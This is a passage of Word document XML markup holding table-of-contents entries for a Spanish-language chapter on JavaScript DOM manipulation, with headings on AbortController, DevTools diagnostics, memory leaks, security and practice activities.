          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2852BE80" w14:textId="237394D3"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08" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>El detalle que hace fracasar la mitad de las bajas</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320008 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09630906" w14:textId="2620ED3B" w:rsidR="000A5A7F" w:rsidRDefault="000A5A7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009" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t xml:space="preserve">4.9.4 — </w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>AbortController</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320009 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="375DDA76" w14:textId="3668F248"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010" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.10 — Lo que cuesta modificar el DOM</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320010 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2692ABF2" w14:textId="36C8F8C6"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11" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Cómo se rompe el agrupamiento</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320011 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63DB3CE7" w14:textId="33A7E6F7"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012" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.11 — Herramientas de diagnóstico</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320012 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CBC4986" w14:textId="7E3CEDE7"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13" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>El panel de elementos, y su pestaña olvidada</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320013 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E5D9132" w14:textId="75371952"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14" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Cuatro utilidades de consola</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320014 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3697D3DA" w14:textId="0FF04A89"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15" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>El panel de memoria, el que confirma la fuga</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320015 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79A71DDF" w14:textId="080E0AD8"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016" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.12 — Seguridad y evolución</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320016 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B31DF63" w14:textId="50674921"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17" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Tres mecanismos que la plataforma incorporó, y en qué estado están</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320017 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="635397AE" w14:textId="701B6BA8"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018" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.13 — Verificación: el checklist honesto</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320018 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18EEC954" w14:textId="387EEA45"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019" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.14 — Los once errores frecuentes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320019 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BAE4A33" w14:textId="070CEC80"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020" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.15 — Las actividades, y qué busca cada una</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320020 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0861403A" w14:textId="5AE9F655"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21" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>1. Árbol real</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320021 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15E99F4E" w14:textId="68806C10"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22" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t xml:space="preserve">2. Catálogo sin </w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>innerHTML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320022 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E912996" w14:textId="25A5AFCE"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23" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>3. El ataque y sus dos defensas</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320023 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61F52673" w14:textId="666622C3"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24" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4. Delegación en el carrito</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320024 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14D0E425" w14:textId="68B8A395"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25" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>5. Ciclo de vida completo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320025 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CCD152B" w14:textId="565DCB1C"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26" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>6. Exploración: el costo del recálculo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320026 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52B1CF2A" w14:textId="7C3C3BBD"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27" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>7. Exploración: qué quedó de jQuery</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320027 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A654F1C" w14:textId="2518F74F"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028" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.16 — Síntesis: las once frases</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320028 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B989845" w14:textId="7023B8DF"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029" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.17 — Qué leer, y en qué orden</w:t>
        </w:r>
        <w:r>
